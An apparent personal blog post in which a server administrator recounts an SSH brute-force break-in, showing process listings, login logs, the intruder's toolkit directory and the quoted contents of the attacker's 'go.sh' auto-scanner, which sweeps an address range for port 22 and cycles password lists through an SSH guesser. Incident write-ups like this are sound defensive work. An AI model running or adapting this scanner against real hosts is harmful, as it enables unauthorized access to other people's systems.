Parsed Participle

Another break-in, this time by a brute-force SSH password-guess. A rarely used user account called neo was logged into from 79.116.242.2, and was running a process that showed up like:

neo  3995  0.0  0.0   1592   4 ?  S  Oct20   0:00 ./ulib

I wonder what it was actually doing. A cursory inspection of it's open file descriptors showed nothing interesting:

# ls -l /proc/3995/fd/
total 3
lrwx------ 1 neo neo 64 Oct 25 07:43 0 -> /dev/pts/1 (deleted)
lrwx------ 1 neo neo 64 Oct 25 07:43 1 -> /dev/pts/1 (deleted)
lrwx------ 1 neo neo 64 Oct 25 07:43 2 -> /dev/pts/1 (deleted)

The login occurred 5 days ago:

44571:Oct 20 19:17:08 faizkazi sshd[2972]: Accepted keyboard-interactive/pam for neo from 79.116.242.2 port 3106 ssh2
44572:Oct 20 19:17:08 faizkazi sshd[2986]: (pam_unix) session opened for user neo by (uid=0)

Someone (or should I say, something, because this looks like some auto-scanning script) gained access via SSH using one of the unused user accounts on this server. Nothing very spectacular, especially since everything was easily visible with ps, and even who. the IP seems to be: 86.123.17.188.

I could see this when I ran who:

faiz     pts/3        Nov 19 13:56 (p02a702.tokynt01.ap.so-net.ne.jp)
vasanth  pts/2        Nov 18 23:37 (86.123.17.188:S.0)

Looks like it never got beyond that, though I saw some hundreds of './ssh' processes running, which, after summarily killing off, I found and archived the offending scripts: These were stored and running off of the directory /var/tmp/vi.recover/irc/ as the user 'vasanth'. I suspect a weak password lead to a brute-force SSH break-in. Not at all a bother, but nothing that can't be fixed by an iptables '-m recent' filter.

Contents of the directory the intruder was running the scripts from:

var/
`-- tmp
    `-- vi.recover
        `-- irc
            |-- 1
            |-- 10
            |-- 11
            |-- 12
            |-- 13
            |-- 14
            |-- 15
            |-- 16
            |-- 17
            |-- 18
            |-- 19
            |-- 2
            |-- 20
            |-- 209.85.ps.22
            |-- 21
            |-- 22
            |-- 23
            |-- 24
            |-- 25
            |-- 26
            |-- 27
            |-- 28
            |-- 29
            |-- 3
            |-- 30
            |-- 31
            |-- 32
            |-- 33
            |-- 34
            |-- 35
            |-- 36
            |-- 37
            |-- 38
            |-- 39
            |-- 4
            |-- 40
            |-- 41
            |-- 42
            |-- 43
            |-- 44
            |-- 45
            |-- 46
            |-- 47
            |-- 48
            |-- 49
            |-- 5
            |-- 50
            |-- 51
            |-- 52
            |-- 53
            |-- 54
            |-- 55
            |-- 56
            |-- 57
            |-- 58
            |-- 59
            |-- 6
            |-- 60
            |-- 61
            |-- 62
            |-- 63
            |-- 64
            |-- 7
            |-- 8
            |-- 9
            |-- all
            |-- common
            |-- full
            |-- go.sh
            |-- mfu.txt
            |-- pass_file
            |-- ps
            |-- r00t
            |-- skan
            |-- ss
            |-- ssh
            `-- x

Some samples from the scripts: Note: though no harm can come if you try running these binaries as a non-root user (if you are running Linux, that is), it's probably a good idea not to run the scripts in this archive - there's no easy way to be sure what they actually do.

$ cat /var/tmp/vi.recover/irc/go.sh 
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan
rm -f bios.txt

#!/bin/bash

clear

rm -rf $1.ps.$2

echo "#=====#==================================#=====#"
echo "#= R =# SSH AUTO SCANNER BY REGELE & CO  #= R =#"
echo "#= E =#-------   #BlackCat TEAM   -------#= E =#"
echo "#= G =#----------------------------------#= G =#"
echo "#= E =# � ALL RIGHTS RESERVED TO Regele �#= E =#"
echo "#= L =#   Now Just Sit Back End Relax    #= L =#"
echo "#= E =#   IPs founder... ACTIVATING!!!   #= E =#"
echo "#Range from -> $1.0.0"
echo "#Range   to -> $1.255.255"
echo "#Looking on -> PORT $2"

./ps $1 $2

sleep 5

cat $1.ps.$2 |sort |uniq > mfu.txt

oopsnr2=`grep -c . mfu.txt`

sleep 5
echo "#---Relax ... Take it Easy---#"

cat 1 > pass_file
sleep 3
./ssh 150

cat 2 > pass_file
sleep 3
./ssh 150

#... and so on

echo "# It's over, you cand go outside and play now #"

Yup, script 'kiddie' all right.